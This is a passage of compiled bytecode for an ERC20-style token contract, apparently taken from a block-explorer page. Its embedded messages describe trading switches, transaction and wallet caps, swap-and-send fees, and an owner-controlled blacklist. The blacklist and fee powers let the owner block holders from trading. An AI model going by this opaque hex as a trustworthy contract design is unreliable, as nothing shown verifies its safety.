049190613156565b1115611b45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b3c90613919565b60405180910390fd5b611f89565b601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015611bed5750601a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611dfa57600d54811115611c37576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c2e906139ab565b60405180910390fd5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015611cdb5750601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b611d1a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d1190613a17565b60405180910390fd5b601060009054906101000a900460ff1615611db15743601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205410611db0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611da790613a83565b60405180910390fd5b5b42601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611f88565b601a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611f8757600e54611e5783610c89565b82611e629190613156565b1115611ea3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e9a90613919565b60405180910390fd5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015611f475750601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b611f86576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f7d90613a17565b60405180910390fd5b5b5b5b5b6000611f9530610c89565b90506000600f548210159050808015611fba5750601060029054906101000a900460ff165b8015611fd35750600b60149054906101000a900460ff16155b80156120295750601c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b801561207f5750601960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156120d55750601960008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612119576001600b60146101000a81548160ff0219169083151502179055506120fd612836565b6000600b60146101000a81548160ff0219169083151502179055505b6000600b60149054906101000a900460ff16159050601960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806121cf5750601960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156121d957600090505b60008115612360576000601c60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561223e57506000601454115b1561226457601654600754111561225957601254905061225f565b60145490505b6122fa565b601c60008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156122bf57506000601354115b156122f95760155460075411156122da5760115490506122f8565b6013549050600760008154809291906122f290613aa3565b91905055505b5b5b61232060646123128389612a4690919063ffffffff16565b612a5c90919063ffffffff16565b915081601860008282546123349190613156565b9250508190555060008211156123505761234f8830846125c0565b5b818661235c9190613aeb565b9550505b61236b8787876125c0565b505050505b505050565b61237d6114b0565b73ffffffffffffffffffffffffffffffffffffffff1661239b610dc6565b73ffffffffffffffffffffffffffffffffffffffff16146123f1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123e890613b6b565b60405180910390fd5b565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b600060648211156125a0576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161259790613bfd565b60405180910390fd5b606482846125ae9190613c1d565b6125b89190613c8e565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361262f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126269061371d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361269e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612695906137af565b60405180910390fd5b6126a9838383612a72565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561272f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161272690613d31565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161281d9190612cee565b60405180910390a3612830848484612a77565b50505050565b600061284130610c89565b905060006018549050600080600084148061285c5750600083145b1561286a5750505050612a44565b8061293d573073ffffffffffffffffffffffffffffffffffffffff1663a9059cbb600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166128d760646128c960c3600e54612a4690919063ffffffff16565b612a5c90919063ffffffff16565b6040518363ffffffff1660e01b81526004016128f492919061341e565b6020604051808303816000875af1158015612913573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190612937919061345c565b50600190505b6000600f5485101561294f5784612953565b600f545b9050600047905061296382612a7c565b60006129788247612cbf90919063ffffffff16565b905060006129a38761299560185485612a4690919063ffffffff16565b612a5c90919063ffffffff16565b90506000601881905550600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16816040516129f390613d82565b60006040518083038185875af1925050503d8060008114612a30576040519150601f19603f3d011682016040523d82523d6000602084013e612a35565b606091505b50508096505050505050505050505b565b60008183612a549190613c1d565b905092915050565b60008183612a6a9190613c8e565b905092915050565b505050565b505050565b6000600267ffffffffffffffff811115612a9957612a98613d97565b5b604051908082528060200260200182016040528015612ac75781602001602082028036833780820191505090505b5090503081600081518110612adf57612ade613dc6565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612b86573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190612baa9190613e0a565b81600181518110612bbe57612bbd613dc6565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050612c2530600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846114b8565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b8152600401612c89959493929190613ef5565b600060405180830381600087803b158015612ca357600080fd5b505af1158015612cb7573d6000803e3d6000fd5b505050505050565b60008183612ccd9190613aeb565b905092915050565b6000819050919050565b612ce881612cd5565b82525050565b6000602082019050612d036000830184612cdf565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015612d43578082015181840152602081019050612d28565b60008484015250505050565b6000601f19601f8301169050919050565b6000612d6b82612d09565b612d758185612d14565b9350612d85818560208601612d25565b612d8e81612d4f565b840191505092915050565b60006020820190508181036000830152612db38184612d60565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000612deb82612dc0565b9050919050565b612dfb81612de0565b8114612e0657600080fd5b50565b600081359050612e1881612df2565b92915050565b612e2781612cd5565b8114612e3257600080fd5b50565b600081359050612e4481612e1e565b92915050565b60008060408385031215612e6157612e60612dbb565b5b6000612e6f85828601612e09565b9250506020612e8085828601612e35565b9150509250929050565b60008115159050919050565b612e9f81612e8a565b82525050565b6000602082019050612eba6000830184612e96565b92915050565b600080600060608486031215612ed957612ed8612dbb565b5b6000612ee786828701612e09565b9350506020612ef886828701612e09565b9250506040612f0986828701612e35565b9150509250925092565b612f1c81612de0565b82525050565b6000602082019050612f376000830184612f13565b92915050565b600060ff82169050919050565b612f5381612f3d565b82525050565b6000602082019050612f6e6000830184612f4a565b92915050565b600060208284031215612f8a57612f89612dbb565b5b6000612f9884828501612e09565b91505092915050565b6000819050919050565b6000612fc6612fc1612fbc84612dc0565b612fa1565b612dc0565b9050919050565b6000612fd882612fab565b9050919050565b6000612fea82612fcd565b9050919050565b612ffa81612fdf565b82525050565b60006020820190506130156000830184612ff1565b92915050565b61302481612e8a565b811461302f57600080fd5b50565b6000813590506130418161301b565b92915050565b6000806040838503121561305e5761305d612dbb565b5b600061306c85828601612e09565b925050602061307d85828601613032565b9150509250929050565b6000806040838503121561309e5761309d612dbb565b5b60006130ac85828601612e09565b92505060206130bd85828601612e09565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061310e57607f821691505b602082108103613121576131206130c7565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061316182612cd5565b915061316c83612cd5565b925082820190508082111561318457613183613127565b5b92915050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b60006131e6603983612d14565b91506131f18261318a565b604082019050919050565b60006020820190508181036000830152613215816131d9565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000613278602583612d14565b91506132838261321c565b604082019050919050565b600060208201905081810360008301526132a78161326b565b9050919050565b7f54726164696e6720697320616c7265616479206f70656e000000000000000000600082015250565b60006132e4601783612d14565b91506132ef826132ae565b602082019050919050565b60006020820190508181036000830152613313816132d7565b9050919050565b6000819050919050565b600061333f61333a6133358461331a565b612fa1565b612cd5565b9050919050565b61334f81613324565b82525050565b600060c08201905061336a6000830189612f13565b6133776020830188612cdf565b6133846040830187613346565b6133916060830186613346565b61339e6080830185612f13565b6133ab60a0830184612cdf565b979650505050505050565b6000815190506133c581612e1e565b92915050565b6000806000606084860312156133e4576133e3612dbb565b5b60006133f2868287016133b6565b9350506020613403868287016133b6565b9250506040613414868287016133b6565b9150509250925092565b60006040820190506134336000830185612f13565b6134406020830184612cdf565b9392505050565b6000815190506134568161301b565b92915050565b60006020828403121561347257613471612dbb565b5b600061348084828501613447565b91505092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006134e5602683612d14565b91506134f082613489565b604082019050919050565b60006020820190508181036000830152613514816134d8565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000613577602483612d14565b91506135828261351b565b604082019050919050565b600060208201905081810360008301526135a68161356a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000613609602283612d14565b9150613614826135ad565b604082019050919050565b60006020820190508181036000830152613638816135fc565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000613675601d83612d14565b91506136808261363f565b602082019050919050565b600060208201905081810360008301526136a481613668565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000613707602583612d14565b9150613712826136ab565b604082019050919050565b60006020820190508181036000830152613736816136fa565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000613799602383612d14565b91506137a48261373d565b604082019050919050565b600060208201905081810360008301526137c88161378c565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b6000613805601683612d14565b9150613810826137cf565b602082019050919050565b60006020820190508181036000830152613834816137f8565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b6000613897603583612d14565b91506138a28261383b565b604082019050919050565b600060208201905081810360008301526138c68161388a565b9050919050565b7f4d61782077616c6c657420657863656564656400000000000000000000000000600082015250565b6000613903601383612d14565b915061390e826138cd565b602082019050919050565b60006020820190508181036000830152613932816138f6565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b6000613995603683612d14565b91506139a082613939565b604082019050919050565b600060208201905081810360008301526139c481613988565b9050919050565b7f596f7572206163636f756e7420697320626c61636b6c69737465642100000000600082015250565b6000613a01601c83612d14565b9150613a0c826139cb565b602082019050919050565b60006020820190508181036000830152613a30816139f4565b9050919050565b7f5472616e736665722044656c617920656e61626c65642e000000000000000000600082015250565b6000613a6d601783612d14565b9150613a7882613a37565b602082019050919050565b60006020820190508181036000830152613a9c81613a60565b9050919050565b6000613aae82612cd5565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203613ae057613adf613127565b5b600182019050919050565b6000613af682612cd5565b9150613b0183612cd5565b9250828203905081811115613b1957613b18613127565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000613b55602083612d14565b9150613b6082613b1f565b602082019050919050565b60006020820190508181036000830152613b8481613b48565b9050919050565b7f50657263656e74616765206d757374206265206265747765656e203020616e6460008201527f2031303000000000000000000000000000000000000000000000000000000000602082015250565b6000613be7602483612d14565b9150613bf282613b8b565b604082019050919050565b60006020820190508181036000830152613c1681613bda565b9050919050565b6000613c2882612cd5565b9150613c3383612cd5565b9250828202613c4181612cd5565b91508282048414831517613c5857613c57613127565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000613c9982612cd5565b9150613ca483612cd5565b925082613cb457613cb3613c5f565b5b828204905092915050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000613d1b602683612d14565b9150613d2682613cbf565b604082019050919050565b60006020820190508181036000830152613d4a81613d0e565b9050919050565b600081905092915050565b50565b6000613d6c600083613d51565b9150613d7782613d5c565b600082019050919050565b6000613d8d82613d5f565b9150819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050613e0481612df2565b92915050565b600060208284031215613e2057613e1f612dbb565b5b6000613e2e84828501613df5565b91505092915050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b613e6c81612de0565b82525050565b6000613e7e8383613e63565b60208301905092915050565b6000602082019050919050565b6000613ea282613e37565b613eac8185613e42565b9350613eb783613e53565b8060005b83811015613ee8578151613ecf8882613e72565b9750613eda83613e8a565b925050600181019050613ebb565b5085935050505092915050565b600060a082019050613f0a6000830188612cdf565b613f176020830187613346565b8181036040830152613f298186613e97565b9050613f386060830185612f13565b613f456080830184612cdf565b969550505050505056fea2646970667358221220d4b3583284df50f829e64f664fc5b397190063d98451826eb942ef6ee3e585c764736f6c63430008130033

Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.